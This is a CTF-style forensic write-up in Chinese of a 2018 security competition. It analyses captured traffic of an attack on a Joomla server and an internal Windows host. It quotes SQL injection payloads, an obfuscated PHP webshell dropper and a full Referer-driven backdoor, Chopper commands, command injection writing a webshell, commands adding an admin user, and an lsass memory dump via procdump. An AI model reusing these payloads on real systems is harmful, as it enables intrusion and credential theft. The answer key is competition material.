0%

2018.5.5-铁人三项赛数据赛数据包分析

5月5号 信息安全铁人三项赛分区赛数据包分析练习

1. 数据包下载链接

1
链接: https://pan.baidu.com/s/1SaZXgD-qb5Z54jKZVE--Lg 提取码: dhv6

2. 题目

1
2
3
4
5
6
7
8
9
10
11
12
13
1.黑客攻击的第一个受害主机的网卡IP地址
2.黑客对URL的哪一个参数实施了SQL注入
3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)
4.第一个受害主机网站数据库的名字
5.Joomla后台管理员的密码是多少
6.黑客第一次获得的php木马的密码是什么
7.黑客第二次上传php木马是什么时间
8.第二次上传的木马通过HTTP协议中的哪个头传递数据
9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
10.php代理第一次被使用时最先连接了哪个IP地址
11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
12.黑客在内网主机中添加的用户名和密码是多少
13.黑客从内网服务器中下载下来的文件名

3. 数据包分析过程

由题干中SQL注入等关键词,猜测黑客第一个攻击的是Web服务。打开第一个数据包,过滤http,往后翻一翻,可以看到

1

可知黑客IP为:202.1.1.2第一个受害主机IP为192.168.1.8

黑客使用的工具是SQLMap,注入的参数是list[select]

构造个过滤规则

1
http and ip.addr == 202.1.1.2 and ip.addr == 192.168.1.8

过滤之后可以看到在No.26416之后黑客开始进行SQL注入

往下一直翻一翻响应,可知第一个受害主机的表前缀是ajtuc_

1
http contains "ajtuc_" and ip.addr == 202.1.1.2 and ip.addr == 192.168.1.8

翻到后面,随便找一个Payload,可以知道进行了报错注入

1
Request URI Query Parameter [truncated]: list[select]=(UPDATEXML(6315,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id

可知数据库库名是joomla

猜测黑客应该是是从数据库中拿到的网站后台的密码。

第一种方法分析黑客进行SQL注入的数据可以知道黑客获得的数据。

第二种黑客有可能会登录joomla的后台。如果能找到黑客登录时的流量,就能直接获取管理员密码。

首先寻找黑客登录的包

1
2
http contains "administrator" and ip.addr == 202.1.1.2 and ip.addr == 192.168.1.8
(http contains "login" || http contains "log in")and ip.addr == 202.1.1.2 and ip.addr == 192.168.1.8

没找到。。

找数据库user表里的数据。

1
http contains "joomla.ajtuc_users" and http contains "password" and ip.addr == 202.1.1.2 and ip.addr == 192.168.1.8

2

可以看到有三条数据。

请求

1
http://202.1.1.1:8000/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7096))

响应

1
Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq' SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

请求

1
http://202.1.1.1:8000/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7939))

响应

1
[truncated]\t<title>Error: 500 XPATH syntax error: &#039;qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq&#039; SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDER BY

请求

1
http://202.1.1.1:8000/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),3079))

响应

1
[truncated]Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq' SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6

可以拼接出密文

1
$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe

But…网上找了一堆解密方法失败,暂且跳过吧,哎。。

再过滤一下

1
http and ip.addr == 202.1.1.2 and ip.addr == 192.168.1.8

翻到后面

No.607927

follow一下TCP

3

1
eval(chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(100).chr(105).chr(114).chr(110).chr(97).chr(109).chr(101).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(83).chr(67).chr(82).chr(73).chr(80).chr(84).chr(95).chr(70).chr(73).chr(76).chr(69).chr(78).chr(65).chr(77).chr(69).chr(39).chr(93).chr(41).chr(46).chr(39).chr(47).chr(107).chr(107).chr(107).chr(97).chr(97).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(100).chr(110).chr(90).chr(50).chr(80).chr(68).chr(57).chr(119).chr(97).chr(72).chr(65).chr(103).chr(90).chr(88).chr(90).chr(104).chr(98).chr(67).chr(103).chr(107).chr(88).chr(49).chr(66).chr(80).chr(85).chr(49).chr(82).chr(98).chr(101).chr(110).chr(112).chr(54).chr(88).chr(83).chr(107).chr(55).chr(80).chr(122).chr(52).chr(61).chr(39).chr(41).chr(41).chr(59));

解码

1
2
3
4
file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/kkkaaa.php',base64_decode('dnZ2PD9waHAgZXZhbCgkX1BPU1Rbenp6XSk7Pz4='));

dnZ2PD9waHAgZXZhbCgkX1BPU1Rbenp6XSk7Pz4=
<?php eval($_POST[zzz]);?>

可知黑客第一次获得的PHP木马的密码是zzz

后面就没什么了,打开第二个数据包

4

很明显前几个黑客使用菜刀连接了一句话木马,分别追踪查看命令。

No.47740

请求

1
2
3
z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();

响应

1
vvv->|/var/www/html/joomla\t\tLinux simple 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 x86_64(apache)|<-

No.232811

很明显传了一个文件上去。

请求

1
2
3
4
5
6
7
&zzz=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B

&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D

&z1=L3Zhci93d3cvaHRtbC9qb29tbGEvdG1wL2Zvb3Rlci5waHA%3D

&z2=3C3F7068700A24703D276C3E5D6F776572223B24693E5D3D246D5B315D5B305D2E246D5B315D3E5D5B315D3B24683E5D3D243E5D736C28247373286D3E5D64352824692E3E5D246B68292C303E5D2C3329293E5D3B24663D24733E5D6C2824733E5D73286D6435273B0A24643D275D713D61727261795F763E5D3E5D616C756573283E5D2471293B3E5D707265675F6D617463685F613E5D6C6C28222F283E5D5B5C5C775D3E5D295B5C5C772D3E5D5D2B3E5D283F3A3B713D3E5D302E285B5C5C645D29293F2C3F2F222C3E273B0A24573D27292C247373283E5D24735B3E5D24695D2C3E5D302C24652929292C243E5D3E5D6B2929293B3E5D246F3D6F625F6765745F636F6E74656E743E5D3E5D7328293B6F625F656E645F3E5D3E5D636C65616E28293B24643D3E5D62617365273B0A24653D275D545F4C414E4755414745225D3B6966282472723E5D2626243E5D7261297B243E5D753D706172733E5D655F3E5D75726C28247272293B7061723E5D73655F73743E5D722824755B223E5D7175657279225D2C243E5D71293B243E273B0A24453D273E5D36345F653E5D6E636F643E5D653E5D283E5D7828677A3E5D636F6D707265737328246F292C246B29293B7072693E5D6E7428223C246B3E24643C3E5D2F246B3E223E5D293E5D3B403E5D73657373696F6E5F64657374723E5D6F7928293B7D7D7D7D273B0A24743D272824692E3E5D246B66292C302C333E5D29293B24703E5D3D22223B666F3E5D7228247A3D313E5D3B247A3C3E5D636F756E7428246D3E5D5B315D293B247A2B3E5D3E5D2B2924703E5D2E3D24715B246D5B3E5D325D5B247A5D5D3B693E273B0A244D3D275D2472612C243E5D6D293B69662824713E5D2626246D3E5D297B4073657373693E5D6F6E5F7374613E5D3E5D727428293B24733D26243E5D5F534553533E5D494F4E3B243E5D3E5D733E5D733D22737562737472223B24736C3D22733E5D3E5D7472746F273B0A24503D275D6628733E5D74723E5D706F732824703E5D2C2468293D3D3D30297B24735B3E5D24695D3D22223B24703E5D3D24737328243E5D702C33293B3E5D7D69662861723E5D7261793E5D5F6B65795F65786973743E5D3E5D732824692C243E5D73293E5D297B243E273B0A246A3D7374725F7265706C61636528276672272C27272C2763667272667265617466726672655F66756E636672746672696F6E27293B0A246B3D275D3B7D7D72653E5D3E5D7475726E20246F3B3E5D7D243E5D723D245F534552563E5D45523B2472723D4024725B3E5D22485454503E5D5F5245464552453E5D52225D3B2472613E5D3D403E5D24725B223E5D485454505F413E5D43433E5D45503E273B0A24673D2722223B666F72283E5D24693D3E5D303B24693C246C3B3E5D293E5D7B666F7228246A3D303B28246A3C3E5D246326263E5D24693C246C293B243E5D6A2B2B2C24693E5D2B2B297B246F2E3E5D3D24747B24693E5D7D5E246B7B246A7D3E273B0A24523D27246B3E5D683D226362343E5D32223B246B663D2265313330223E5D3B66756E6374696F3E5D6E3E5D20782824743E5D2C246B297B24633D733E5D74726C653E5D3E5D6E28246B293B246C3D7374726C653E5D6E3E5D282474293E5D3B246F3D273B0A24513D275D735B24695D2E3D24703B24653D737472703E5D3E5D6F73283E5D24735B24693E5D5D2C2466293B696628243E5D65297B246B3D246B682E246B3E5D663B3E5D6F625F7374613E5D727428293B40653E5D76616C2840677A756E3E5D636F3E273B0A24763D275D6D70726573732840783E5D2840623E5D61733E5D3E5D6536345F6465636F64652870723E5D3E5D653E5D675F7265706C613E5D636528617272617928222F5F2F222C222F2D2F22292C6172723E5D6179283E5D222F222C222B223E5D273B0A24783D7374725F7265706C61636528273E5D272C27272C24522E24672E246B2E24652E24642E244D2E24702E24742E24502E24512E24762E24572E2445293B0A244E3D246A2827272C2478293B244E28293B0A3F3E0A

分别解码得

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
z0:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1:
/var/www/html/joomla/tmp/footer.php
z2:
<?php
$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';
$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>';
$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';
$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';
$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';
$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';
$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';
$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';
$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');
$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';
$g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';
$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';
$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';
$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';
$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N=$j('',$x);$N();
?>

上传的文件是footer.php,很明显经过了混淆。

footer.php应该就是黑客上传的第二个马

大致解一下,输出一下$x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k) {
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0;$i < $l;) {
for ($j = 0;($j < $c && $i < $l);$j++, $i++) {
$o.= $t{$i} ^ $k{$j};
}
}
return $o;
}
$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
$u = parse_url($rr);
parse_str($u["query"], $q);
$q = array_values($q);
preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
if ($q && $m) {
@session_start();
$s = & $_SESSION;
$ss = "substr";
$sl = "strtolower";
$i = $m[1][0] . $m[1][1];
$h = $sl($ss(md5($i . $kh), 0, 3));
$f = $sl($ss(md5($i . $kf), 0, 3));
$p = "";
for ($z = 1;$z < count($m[1]);$z++) $p.= $q[$m[2][$z]];
if (strpos($p, $h) === 0) {
$s[$i] = "";
$p = $ss($p, 3);
}
if (array_key_exists($i, $s)) {
$s[$i].= $p;
$e = strpos($s[$i], $f);
if ($e) {
$k = $kh . $kf;
ob_start();
@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
$o = ob_get_contents();
ob_end_clean();
$d = base64_encode(x(gzcompress($o), $k));
print ("<$k>$d</$k>");
@session_destroy();
}
}
}
}
?>

可以确定这就是第二个木马了。上传时间为

17:20:44.248365

5

根据小马里的内容

1
2
3
$rr = @$r["HTTP_REFERER"];

$ra = @$r["HTTP_ACCEPT_LANGUAGE"];

再结合后面黑客对footer.php的请求

6

很明显可以知道黑客用HTTP_REFERER来传递数据。

接下来问题询问的是关于MySQL的,这就不能用HTTP了,直接过滤mysql

1
mysql

但是没有任何数据

换下一个数据包,没有。。

第三个还没有。。

打开第四个数据包。

开头就是相当多的登录请求,估计黑客是在爆破MySQL密码。

内网主机是192.168.2.20

往下翻

到最后,看响应,说明黑客登录成功了

7

最后一个请求就是我们要找的账号密码。

1
2
3
Username: admin

Password: 1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

后面的题目问的关于php代理,有可能是用的reGeorghttp上的代理。

搜索下http contains "tunnel"

成功找到tunnel.php

8

可以看到可以找到代理最先访问了 4.2.2.253端口。

后面题目问的是“黑客第一次获取到当前目录下的文件列表的漏洞利用请求”,也就是说黑客有可能执行了ls或者dir命令。

接着往下找

1
(ip.addr == 192.168.1.8 or ip.addr == 202.1.1.2) and (http contains "dir" or http contains "ls")

前几个数据包都没发现

第七个数据包

9

可以找到疑似利用的痕迹。。但是根据响应来看并没有成功执行

第八个数据包

没有发现

第九个数据包

1
(ip.addr == 192.168.1.8 or ip.addr == 202.1.1.2) and (http contains "dir" or http contains "ls"

过滤之后有发现了

10

很容易可以知道黑客首先利用漏洞执行ls命令。

但没成功,后面又执行了dir命令,从响应中可以清晰的看到dir命令成功执行

时间为10:36:59.770782

内网主机192.168.2.20是一台Windows

网站目录是C:phpStudy\WWW\

192.168.2.20上可以通过漏洞直接执行命令

过滤一下看看后续操作

1
http and ip.addr == 192.168.2.20

很明显可以看到黑客先后执行了 dir pwd dir命令

然后写了一个马sh.php

1
http://192.168.2.20/install/index.php?0=system&1=echo "<?php eval($_POST[123]);?>" > sh.php

11

根据后面的访问请求,黑客使用菜刀连接了sh.php,进行分析,这里应该利用菜刀上传了一个文件

12

13

看数据文件头4D5A90

对payload解码一下

1
C:\phpStudy\WWW\b2evolution\install\test\procdump.exe

黑客应该上传了一个叫做procdumpexe程序。

再接着往下走

No.375758

看响应黑客应该是执行了net user命令

分析一下请求

1
2
3
4
5
6
7
8
9
10
11
12
13
Form item: "action" = "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5h

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirna

Form item: "z1" = "Y21k"

cmd

Form item: "z2" = "Y2QvZCJDOlxwaHBTdHVkeVxXV1dcYjJldm9sdXRpb25caW5zdGFsbFx0ZXN0XCImbmV0IHVzZXIm

ZWNobyBbU10mY2QmZWNobyBbRV0="

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user&echo [S]&cd&echo [E]

没有猜错XD

往下No.377608

1
2
3
4
5
z2 = Y2QvZCJDOlxwaHBTdHVkeVxXV1dcYjJldm9sdXRpb25caW5zdGFsbFx0ZXN0XCImbmV0IHVzZXIg

a2FrYSBrYWthIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]

黑客增加了一个账号密码均为kaka的用户

No.378140

1
2
3
4
5
Form item: "z2" = "Y2QvZCJDOlxwaHBTdHVkeVxXV1dcYjJldm9sdXRpb25caW5zdGFsbFx0ZXN0XCImbmV0IHVzZXIg

bG9jYWxncm91cCBhZG1pbmlzdHJhdG9yIHN0YXIgL2FkZCZlY2hvIFtTXSZjZCZlY2hvIFtFXQ=="

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user localgroup administrator star /add&echo [S]&cd&echo [E]

No.378877

1
2
3
4
5
Form item: "z2" = "Y2QvZCJDOlxwaHBTdHVkeVxXV1dcYjJldm9sdXRpb25caW5zdGFsbFx0ZXN0XCImbmV0IHVzZXIm

ZWNobyBbU10mY2QmZWNobyBbRV0="

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user&echo [S]&cd&echo [E]

15

成功添加用户kaka并将其添加到管理员组

再往下No.407291

看响应黑客执行了之前上传的procdump.exe,但并没有执行成功。

1
2
3
4
5
Form item: "z2" = "Y2QvZCJDOlxwaHBTdHVkeVxXV1dcYjJldm9sdXRpb25caW5zdGFsbFx0ZXN0XCImcHJvY2R1bXAu

ZXhlIC1hY2NlcHRldWxhIC1tYSBsc3Bhc3NzLmRtcCZlY2hvIFtTXSZjZCZlY2hvIFtFXQ=="

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lspasss.dmp&echo [S]&cd&echo [E]

16

继续往下No.424788

17

从响应来看这次成功执行了,

1
[18:52:47] Dump 1 initiated: C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp\r\n

No.431557开始,黑客将生成的文件下载到自己主机上

1
2
3
4
5
6
7
8
9
z1 = "QzpccGhwU3R1ZHlcV1dXXGIyZXZvbHV0aW9uXGluc3RhbGxcdGVzdFxsc2Fzcy5leGVfMTgwMjA4

XzE4NTI0Ny5kbXA="

C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp

action = "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP2Jhc2U2NF9kZWNvZGUoc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSkpOmJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MSJdKTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7"

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?base64_decode(stripslashes($_POST["z1"])):base64_decode($_POST["z1"]);$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();

后面第十个数据包基本上就是那个文件的传输过程了

4. 最后答案

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
1.黑客攻击的第一个受害主机的网卡IP地址
192.168.1.8
2.黑客对URL的哪一个参数实施了SQL注入
list[select]
3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)
ajtuc_
4.第一个受害主机网站数据库的名字
joomla
5.Joomla后台管理员的密码是多少
跳过...
6.黑客第一次获得的php木马的密码是什么
zzz
7.黑客第二次上传php木马是什么时间
17:20:44.248365
8.第二次上传的木马通过HTTP协议中的哪个头传递数据
HTTP_REFERER
9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4
10.php代理第一次被使用时最先连接了哪个IP地址
4.2.2.2
11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
10:36:59.770782
12.黑客在内网主机中添加的用户名和密码是多少
kaka:kaka
13.黑客从内网服务器中下载下来的文件名
lsass.exe_180208_185247.dmp